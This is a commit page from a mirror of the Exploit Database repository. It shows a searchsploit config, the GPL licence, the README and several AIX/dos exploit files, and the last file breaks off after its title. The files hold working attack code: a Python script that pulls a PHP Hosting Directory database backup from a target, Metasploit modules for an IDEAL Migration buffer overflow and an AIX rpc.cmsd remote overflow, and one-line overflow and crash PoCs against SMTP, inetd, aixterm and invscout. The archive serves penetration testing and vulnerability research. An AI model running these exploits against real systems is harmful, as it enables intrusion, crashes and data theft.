bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-03-28 18:47:11 +00:00
commit 535b1933b6
47186 changed files with 4007663 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

26
.searchsploit_rc Normal file
View file

@ -0,0 +1,26 @@
##-- Program Settings
progname="$( basename "$0" )"
##-- Exploits
files_array+=("files_exploits.csv")
path_array+=("/opt/exploitdb")
name_array+=("Exploit")
git_array+=("https://gitlab.com/exploit-database/exploitdb.git")
package_array+=("exploitdb")
##-- Shellcodes
files_array+=("files_shellcodes.csv")
path_array+=("/opt/exploitdb")
name_array+=("Shellcode")
git_array+=("https://gitlab.com/exploit-database/exploitdb.git")
package_array+=("exploitdb")
##-- Papers
files_array+=("files_papers.csv")
path_array+=("/opt/exploitdb-papers")
name_array+=("Paper")
git_array+=("https://gitlab.com/exploit-database/exploitdb-papers.git")
package_array+=("exploitdb-papers")

339
LICENSE.md Normal file
View file

@ -0,0 +1,339 @@
GNU GENERAL PUBLIC LICENSE
Version 2, June 1991
Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The licenses for most software are designed to take away your
freedom to share and change it. By contrast, the GNU General Public
License is intended to guarantee your freedom to share and change free
software--to make sure the software is free for all its users. This
General Public License applies to most of the Free Software
Foundation's software and to any other program whose authors commit to
using it. (Some other Free Software Foundation software is covered by
the GNU Lesser General Public License instead.) You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
this service if you wish), that you receive source code or can get it
if you want it, that you can change the software or use pieces of it
in new free programs; and that you know you can do these things.
To protect your rights, we need to make restrictions that forbid
anyone to deny you these rights or to ask you to surrender the rights.
These restrictions translate to certain responsibilities for you if you
distribute copies of the software, or if you modify it.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must give the recipients all the rights that
you have. You must make sure that they, too, receive or can get the
source code. And you must show them these terms so they know their
rights.
We protect your rights with two steps: (1) copyright the software, and
(2) offer you this license which gives you legal permission to copy,
distribute and/or modify the software.
Also, for each author's protection and ours, we want to make certain
that everyone understands that there is no warranty for this free
software. If the software is modified by someone else and passed on, we
want its recipients to know that what they have is not the original, so
that any problems introduced by others will not reflect on the original
authors' reputations.
Finally, any free program is threatened constantly by software
patents. We wish to avoid the danger that redistributors of a free
program will individually obtain patent licenses, in effect making the
program proprietary. To prevent this, we have made it clear that any
patent must be licensed for everyone's free use or not licensed at all.
The precise terms and conditions for copying, distribution and
modification follow.
GNU GENERAL PUBLIC LICENSE
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0. This License applies to any program or other work which contains
a notice placed by the copyright holder saying it may be distributed
under the terms of this General Public License. The "Program", below,
refers to any such program or work, and a "work based on the Program"
means either the Program or any derivative work under copyright law:
that is to say, a work containing the Program or a portion of it,
either verbatim or with modifications and/or translated into another
language. (Hereinafter, translation is included without limitation in
the term "modification".) Each licensee is addressed as "you".
Activities other than copying, distribution and modification are not
covered by this License; they are outside its scope. The act of
running the Program is not restricted, and the output from the Program
is covered only if its contents constitute a work based on the
Program (independent of having been made by running the Program).
Whether that is true depends on what the Program does.
1. You may copy and distribute verbatim copies of the Program's
source code as you receive it, in any medium, provided that you
conspicuously and appropriately publish on each copy an appropriate
copyright notice and disclaimer of warranty; keep intact all the
notices that refer to this License and to the absence of any warranty;
and give any other recipients of the Program a copy of this License
along with the Program.
You may charge a fee for the physical act of transferring a copy, and
you may at your option offer warranty protection in exchange for a fee.
2. You may modify your copy or copies of the Program or any portion
of it, thus forming a work based on the Program, and copy and
distribute such modifications or work under the terms of Section 1
above, provided that you also meet all of these conditions:
a) You must cause the modified files to carry prominent notices
stating that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in
whole or in part contains or is derived from the Program or any
part thereof, to be licensed as a whole at no charge to all third
parties under the terms of this License.
c) If the modified program normally reads commands interactively
when run, you must cause it, when started running for such
interactive use in the most ordinary way, to print or display an
announcement including an appropriate copyright notice and a
notice that there is no warranty (or else, saying that you provide
a warranty) and that users may redistribute the program under
these conditions, and telling the user how to view a copy of this
License. (Exception: if the Program itself is interactive but
does not normally print such an announcement, your work based on
the Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If
identifiable sections of that work are not derived from the Program,
and can be reasonably considered independent and separate works in
themselves, then this License, and its terms, do not apply to those
sections when you distribute them as separate works. But when you
distribute the same sections as part of a whole which is a work based
on the Program, the distribution of the whole must be on the terms of
this License, whose permissions for other licensees extend to the
entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest
your rights to work written entirely by you; rather, the intent is to
exercise the right to control the distribution of derivative or
collective works based on the Program.
In addition, mere aggregation of another work not based on the Program
with the Program (or with a work based on the Program) on a volume of
a storage or distribution medium does not bring the other work under
the scope of this License.
3. You may copy and distribute the Program (or a work based on it,
under Section 2) in object code or executable form under the terms of
Sections 1 and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable
source code, which must be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three
years, to give any third party, for a charge no more than your
cost of physically performing source distribution, a complete
machine-readable copy of the corresponding source code, to be
distributed under the terms of Sections 1 and 2 above on a medium
customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer
to distribute corresponding source code. (This alternative is
allowed only for noncommercial distribution and only if you
received the program in object code or executable form with such
an offer, in accord with Subsection b above.)
The source code for a work means the preferred form of the work for
making modifications to it. For an executable work, complete source
code means all the source code for all modules it contains, plus any
associated interface definition files, plus the scripts used to
control compilation and installation of the executable. However, as a
special exception, the source code distributed need not include
anything that is normally distributed (in either source or binary
form) with the major components (compiler, kernel, and so on) of the
operating system on which the executable runs, unless that component
itself accompanies the executable.
If distribution of executable or object code is made by offering
access to copy from a designated place, then offering equivalent
access to copy the source code from the same place counts as
distribution of the source code, even though third parties are not
compelled to copy the source along with the object code.
4. You may not copy, modify, sublicense, or distribute the Program
except as expressly provided under this License. Any attempt
otherwise to copy, modify, sublicense or distribute the Program is
void, and will automatically terminate your rights under this License.
However, parties who have received copies, or rights, from you under
this License will not have their licenses terminated so long as such
parties remain in full compliance.
5. You are not required to accept this License, since you have not
signed it. However, nothing else grants you permission to modify or
distribute the Program or its derivative works. These actions are
prohibited by law if you do not accept this License. Therefore, by
modifying or distributing the Program (or any work based on the
Program), you indicate your acceptance of this License to do so, and
all its terms and conditions for copying, distributing or modifying
the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the
Program), the recipient automatically receives a license from the
original licensor to copy, distribute or modify the Program subject to
these terms and conditions. You may not impose any further
restrictions on the recipients' exercise of the rights granted herein.
You are not responsible for enforcing compliance by third parties to
this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot
distribute so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you
may not distribute the Program at all. For example, if a patent
license would not permit royalty-free redistribution of the Program by
all those who receive copies directly or indirectly through you, then
the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under
any particular circumstance, the balance of the section is intended to
apply and the section as a whole is intended to apply in other
circumstances.
It is not the purpose of this section to induce you to infringe any
patents or other property right claims or to contest validity of any
such claims; this section has the sole purpose of protecting the
integrity of the free software distribution system, which is
implemented by public license practices. Many people have made
generous contributions to the wide range of software distributed
through that system in reliance on consistent application of that
system; it is up to the author/donor to decide if he or she is willing
to distribute software through any other system and a licensee cannot
impose that choice.
This section is intended to make thoroughly clear what is believed to
be a consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in
certain countries either by patents or by copyrighted interfaces, the
original copyright holder who places the Program under this License
may add an explicit geographical distribution limitation excluding
those countries, so that distribution is permitted only in or among
countries not thus excluded. In such case, this License incorporates
the limitation as if written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions
of the General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and "any
later version", you have the option of following the terms and conditions
either of that version or of any later version published by the Free
Software Foundation. If the Program does not specify a version number of
this License, you may choose any version ever published by the Free Software
Foundation.
10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author
to ask for permission. For software which is copyrighted by the Free
Software Foundation, write to the Free Software Foundation; we sometimes
make exceptions for this. Our decision will be guided by the two goals
of preserving the free status of all derivatives of our free software and
of promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
convey the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
Also add information on how to contact you by electronic and paper mail.
If the program is interactive, make it output a short notice like this
when it starts in an interactive mode:
Gnomovision version 69, Copyright (C) year name of author
Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, the commands you use may
be called something other than `show w' and `show c'; they could even be
mouse-clicks or menu items--whatever suits your program.
You should also get your employer (if you work as a programmer) or your
school, if any, to sign a "copyright disclaimer" for the program, if
necessary. Here is a sample; alter the names:
Yoyodyne, Inc., hereby disclaims all copyright interest in the program
`Gnomovision' (which makes passes at compilers) written by James Hacker.
<signature of Ty Coon>, 1 April 1989
Ty Coon, President of Vice
This General Public License does not permit incorporating your program into
proprietary programs. If your program is a subroutine library, you may
consider it more useful to permit linking proprietary applications with the
library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License.

174
README.md Normal file
View file

@ -0,0 +1,174 @@
# The Exploit Database Git Repository
This is an official repository of [The Exploit Database](https://www.exploit-db.com/), a [project](https://www.offensive-security.com/community-projects/) sponsored by [Offensive Security](https://www.offensive-security.com/).
Our repositories are:
- Exploits & Shellcodes: [gitlab.com/exploit-database/exploitdb](https://gitlab.com/exploit-database/exploitdb)
- Binary Exploits: [gitlab.com/exploit-database/exploitdb-bin-sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits)
- Papers: [gitlab.com/exploit-database/exploitdb-papers](https://gitlab.com/exploit-database/exploitdb-papers)
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of [exploits](https://www.exploit-db.com/), [shellcode](https://www.exploit-db.com/shellcodes) and [papers](https://www.exploit-db.com/papers) gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away.
You can learn more about the project [here (Top Right -> About Exploit-DB)](https://www.exploit-db.com/) and [here (History)](https://www.exploit-db.com/history).
This repository is updated daily with the most recently added submissions. Any additional resources can be found in our [binary exploits repository](https://gitlab.com/exploit-database/exploitdb-bin-sploits).
Exploits are located in the [`/exploits/`](https://gitlab.com/exploit-database/exploitdb/tree/main/exploits) directory, shellcodes can be found in the [`/shellcodes/`](https://gitlab.com/exploit-database/exploitdb/tree/main/shellcodes) directory.
- - -
## License
This project (and SearchSploit) is released under "[GNU General Public License v2.0](https://gitlab.com/exploit-database/exploitdb/-/blob/main/LICENSE.md)".
- - -
# SearchSploit
Included with this repository is the **SearchSploit** utility, which will allow you to search through exploits, shellcodes and papers _(if installed)_ using one or more terms.
For more information, please see the **[SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
## Usage/Example
```
kali@kali:~$ searchsploit -h
Usage: searchsploit [options] term1 [term2] ... [termN]
==========
Examples
==========
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | jq
searchsploit --cve 2021-44228
For more examples, see the manual: https://www.exploit-db.com/searchsploit
=========
Options
=========
## Search Terms
-c, --case [term] Perform a case-sensitive search (Default is inSEnsITiVe)
-e, --exact [term] Perform an EXACT & order match on exploit title (Default is an AND match on each term) [Implies "-t"]
e.g. "WordPress 4.1" would not be detect "WordPress Core 4.1")
-s, --strict Perform a strict search, so input values must exist, disabling fuzzy search for version range
e.g. "1.1" would not be detected in "1.0 < 1.3")
-t, --title [term] Search JUST the exploit title (Default is title AND the file's path)
--exclude="term" Remove values from results. By using "|" to separate, you can chain multiple values
e.g. --exclude="term1|term2|term3"
--cve [CVE] Search for Common Vulnerabilities and Exposures (CVE) value
## Output
-j, --json [term] Show result in JSON format
-o, --overflow [term] Exploit titles are allowed to overflow their columns
-p, --path [EDB-ID] Show the full path to an exploit (and also copies the path to the clipboard if possible)
-v, --verbose Display more information in output
-w, --www [term] Show URLs to Exploit-DB.com rather than the local path
--id Display the EDB-ID value rather than local path
--disable-colour Disable colour highlighting in search results
## Non-Searching
-m, --mirror [EDB-ID] Mirror (aka copies) an exploit to the current working directory
-x, --examine [EDB-ID] Examine (aka opens) the exploit using $PAGER
## Non-Searching
-h, --help Show this help screen
-u, --update Check for and install any exploitdb package updates (brew, deb & git)
## Automation
--nmap [file.xml] Checks all results in Nmap's XML output with service version
e.g.: nmap [host] -sV -oX file.xml
=======
Notes
=======
* You can use any number of search terms
* By default, search terms are not case-sensitive, ordering is irrelevant, and will search between version ranges
* Use '-c' if you wish to reduce results by case-sensitive searching
* And/Or '-e' if you wish to filter results by using an exact match
* And/Or '-s' if you wish to look for an exact version match
* Use '-t' to exclude the file's path to filter the search results
* Remove false positives (especially when searching using numbers - i.e. versions)
* When using '--nmap', adding '-v' (verbose), it will search for even more combinations
* When updating or displaying help, search terms will be ignored
kali@kali:~$
kali@kali:~$ searchsploit afd windows local
---------------------------------------------------------------------------------------- -----------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------- -----------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046) | windows/dos/18755.c
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit) | windows/local/21844.rb
Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86-64/local/39525.py
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86/local/39446.py
Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service | windows/dos/17133.c
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066) | windows/local/6757.txt
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080) | windows/local/18176.py
---------------------------------------------------------------------------------------- -----------------------------------
Shellcodes: No Result
kali@kali:~$
kali@kali:~$ searchsploit -p 39446
Exploit: Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
URL: https://www.exploit-db.com/exploits/39446
Path: /Users/b/Projects/git/forks/exploitdb/exploits/windows_x86/local/39446.py
Codes: N/A
Verified: False
File Type: Python script text executable, ASCII text
Copied EDB-ID #39446's path to the clipboard
kali@kali:~$
```
- - -
## Install
SearchSploit requires either "CoreUtils" or "utilities" (e.g. `bash`, `sed`, `grep`, `awk`, etc.) for the core features to work.
The self updating function will require `git`, and for the Nmap XML option to work, will require `xmllint` (found in the `libxml2-utils` package in Debian-based systems).
You can find a **more in-depth guide in the [SearchSploit manual](https://www.exploit-db.com/searchsploit)**.
**Kali Linux**
Exploit-DB/SearchSploit is already packaged inside of Kali-Linux. A method of installation is:
```
kali@kali:~$ sudo apt -y install exploitdb
```
_NOTE, Optional is to install the additional packages:_
```
kali@kali:~$ sudo apt -y install exploitdb-bin-sploits exploitdb-papers
```
**Git**
In short, clone the repository, add the binary into `$PATH`, and edit the config file to reflect the git path:
```
$ sudo git clone https://gitlab.com/exploit-database/exploitdb.git /opt/exploitdb
$ sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
```
**Homebrew**
If you have [homebrew](http://brew.sh/) ([package](https://github.com/Homebrew/homebrew-core/blob/master/Formula/exploitdb.rb), [formula](https://formulae.brew.sh/formula/exploitdb)) installed, running the following will get you set up:
```
user@MacBook:~$ brew update && brew install exploitdb
```
- - -
## Credit
The following people made this possible:
- [Offensive Security](https://www.offensive-security.com/)
- [@Unix-Ninja](https://github.com/unix-ninja)
- [@g0tmi1k](https://blog.g0tmi1k.com/)

197
exploits/aix/dos/15264.py Executable file
View file

@ -0,0 +1,197 @@
#!/usr/bin/env python
#-*- coding:cp1254 -*-
'''
# Title : PHP Hosting Directory 2.0 Database Disclosure Exploit (.py)
# Author : ZoRLu / http://inj3ct0r.com/author/577
# mail-msn : admin@yildirimordulari.com
# Down. Script : -
# Proof : http://img214.imageshack.us/img214/2407/directory.jpg
# Tested : Windows XP Professional sp3
# Home : http://z0rlu.blogspot.com
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org
# Date : 16/10/2010
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
# Lakirdi : off ulan off / http://www.youtube.com/watch?v=mIdwAz7-cHk
'''
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()
if len(sys.argv) < 3:
import os
os.system(['clear','cls'][1])
os.system('color 2')
print "_______________________________________________________________"
print " "
print " PHP Hosting Directory 2.0 Database Disclosure Exploit (.py) "
print " "
print " coded by ZoRLu "
print " "
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
print " "
print " example day-mounth-year for today: "
print " "
print " today: 16-10-2010 "
print " "
print "_______________________________________________________________"
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
''' link kontrol 1 '''
add = "http://"
add2 = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != add2:
print "\nnwhere is it: " + add2
print "okk I will add"
time.sleep(2)
sitemiz += add2
print "its ok" + " " + sitemiz
if sitemiz[:7] != add:
print "\nwhere is it: " + add
print "okk I will add"
time.sleep(2)
sitemiz = add + sitemiz
print "its ok" + " " + sitemiz
db = "admin/backup/db/backup_db_"
tarih = sys.argv[2]
uzanti = ".sql.gz"
url2 = sitemiz + db + tarih + uzanti
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
import os
import sys
print "\nForbidden Sorry! Server has a Security!"
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':
import sys
if len(sys.argv) == 3:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'

107
exploits/aix/dos/16657.rb Executable file
View file

@ -0,0 +1,107 @@
##
# $Id: ideal_migration_ipj.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'PointDev IDEAL Migration Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in versions v9.7
through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
IDEAL Migration. All versions are suspected to be vulnerable.
By creating a specially crafted ipj file, an an attacker may be able
to execute arbitrary code.
NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
},
'License' => MSF_LICENSE,
'Author' => [ 'Dr_IDE', 'dookie', 'jduck' ],
'Version' => '$Revision: 10477 $',
'References' =>
[
[ 'CVE', '2009-4265' ],
[ 'OSVDB', '60681' ],
[ 'URL', 'http://www.exploit-db.com/exploits/10319' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12403' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12404' ],
[ 'URL', 'http://www.exploit-db.com/exploits/12540' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x1a\x22\x3c\x3e",
'StackAdjustment' => -3500,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'IDEAL Migration <= 4.5.1 on Windows XP',
{
'Ret' => 0x1001411e # CALL EBP in ULMigration_us.dll
# 'Ret' => 0x7c96bf33 # JMP ESP in ULMigration_us.dll (from Blake)
# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
}
],
[ 'IDEAL Administration <= 10.5 on Windows XP',
{
'Ret' => 0x10010F2E # CALL EBP in ListWmi.dll
# 'Ret' => 0x77f31d2f # JMP ESP in ?? (from Dr_IDE)
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Dec 05 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.ipj']),
], self.class)
end
def exploit
ipj = "\r\n"
ipj << "[Group,Export,Yes]\r\n"
ipj << "Computer="
sploit = ""
sploit << rand_text_alpha_upper(2420)
sploit << [target.ret].pack('V')
# These nops are required to move the payload below where ebp points
# when returning...
sploit << make_nops(768)
sploit << payload.encoded
ipj << sploit
ipj << "\r\n"
ipj << "[End]\r\n"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(ipj)
end
end

121
exploits/aix/dos/16929.rb Executable file
View file

@ -0,0 +1,121 @@
##
# $Id: rpc_cmsd_opcode21.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SunRPC
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in opcode 21 handled by
rpc.cmsd on AIX. By making a request with a long string passed to the first
argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
leads to arbitrary code execution.
NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
further attempts are not possible.
},
'Author' =>
[
'Rodrigo Rubira Branco (BSDaemon)',
'jduck',
],
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-3699' ],
[ 'OSVDB', '58726' ],
[ 'BID', '36615' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
[ 'URL', 'http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
],
'Platform' => [ 'aix' ],
'Payload' =>
{
'Space' => 4104,
'BadChars' => "\x00",
# The RPC function splits the string by 0x40, watch out!
# It's not a payload badchar since we're putting the payload elsewhere...
'DisableNops' => true
},
'Targets' =>
[
[
'IBM AIX Version 5.1',
{
'Arch' => 'ppc',
'Platform' => 'aix',
'AIX' => '5.1',
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x2022dfc8 },
#worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
'Stop' => { 'Ret' => 0x202302c8 },
'Step' => 600
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 07 2009'))
end
def brute_exploit(brute_target)
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
begin
if (not sunrpc_create('udp', 100068, 4))
raise RuntimeError, 'sunrpc_create failed'
end
# spray the heap a bit (work around powerpc cache issues)
buf = make_nops(1024 - @aixpayload.length)
buf << @aixpayload
xdr = XDR.encode(buf, buf)
10.times {
sunrpc_call(7, xdr, 2)
}
#print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
buf = rand_text_alphanumeric(payload_space)
buf << [brute_target['Ret']].pack('N')
xdr = XDR.encode(buf, "")
sunrpc_authunix('localhost', 0, 0, [])
sunrpc_call(21, xdr, 2)
handler(sunrpc_callsock)
sunrpc_destroy
rescue Rex::Proto::SunRPC::RPCTimeout
# print_error('RPCTimeout')
rescue EOFError
# print_error('EOFError')
end
end
end

15
exploits/aix/dos/19046.txt Normal file
View file

@ -0,0 +1,15 @@
source: https://www.securityfocus.com/bid/61/info
There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port
and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash.
$ telnet some.where
Trying 1.2.3.4...
Connected to some.where.
Escape character is '^]'.
220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready
HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
[ and it just hangs ]
$ ping some.where
[ ...nothing... ]

10
exploits/aix/dos/19049.txt Normal file
View file

@ -0,0 +1,10 @@
source: https://www.securityfocus.com/bid/66/info
A vulnerability exists in inetd which allows a remote user to crash inetd if the tcpmux service is not commented
out of /etc/inetd.conf. The tcpmux service is defined in RFC1078
$ nmap -p 1-64000 -i <target host>
It is also claimed inetd will die if the Windows 95/NT
program postscan.exe, made by 7thsphere, is run againts
the host.

10
exploits/aix/dos/19418.txt Normal file
View file

@ -0,0 +1,10 @@
source: https://www.securityfocus.com/bid/520/info
adb is the debugger that ships with IBM's AIX operating system. It is possible for a local user to cause a local denial of service through exploiting the version of adb shipped with AIX 4.2 through 4.3.1. The consequence of adb being exploited is the machine being halted by a malicious local user.
gcc -g -o a.out hello-world.c
$ adb a.out -
adb
.main,5:s
a.out: running

7
exploits/aix/dos/22249.txt Normal file
View file

@ -0,0 +1,7 @@
source: https://www.securityfocus.com/bid/6840/info
A buffer overflow vulnerability has been discovered in the libIM library available for the AIX 4.3, 5.1, 5.2 operating system. As a result it may be possible to overwrite sensitive memory in programs linked to the affected library. By identifying a linked application with the setuid bit applied, it may be possible to exploit this vulnerability to execute code with elevated privileges.
Under certain circumstances this issue may pose as a remote security threat.
/usr/lpp/X11/bin/aixterm -im `perl -e 'print "A"x47; print pack("l",0x11223344)'`

5
exploits/aix/dos/25807.txt Normal file
View file

@ -0,0 +1,5 @@
source: https://www.securityfocus.com/bid/13909/info
invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line.
/usr/sbin/invscout `perl -e 'print "A" x 1024;'`

133
exploits/aix/dos/33943.txt Normal file
View file

@ -0,0 +1,133 @@
Document Title:
============
Flussonic Media Server 4.3.3 Multiple Vulnerabilities
Release Date:
===========
